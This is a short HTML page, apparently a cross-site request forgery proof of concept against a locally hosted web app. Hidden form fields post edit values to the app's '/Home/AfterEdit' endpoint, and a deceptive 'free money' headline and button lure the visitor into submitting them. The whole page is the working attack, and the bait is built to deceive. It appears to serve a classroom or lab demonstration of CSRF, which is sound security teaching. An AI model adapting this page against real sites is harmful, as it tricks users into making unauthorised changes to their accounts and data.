<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
  </head>
  <body>
    <form action="http://localhost:52753/Home/AfterEdit" method="post">
      <input type="hidden" name="No" value="5" />
      <input type="hidden" name="Name" value="NOMAD" />
      <input type="hidden" name="Address" value="Moon" />

      <h1>For Free Money Directly Into Your Account Click Below Button</h1>
      <input type="submit" value="CLick HERE" />
    </form>
  </body>
</html>
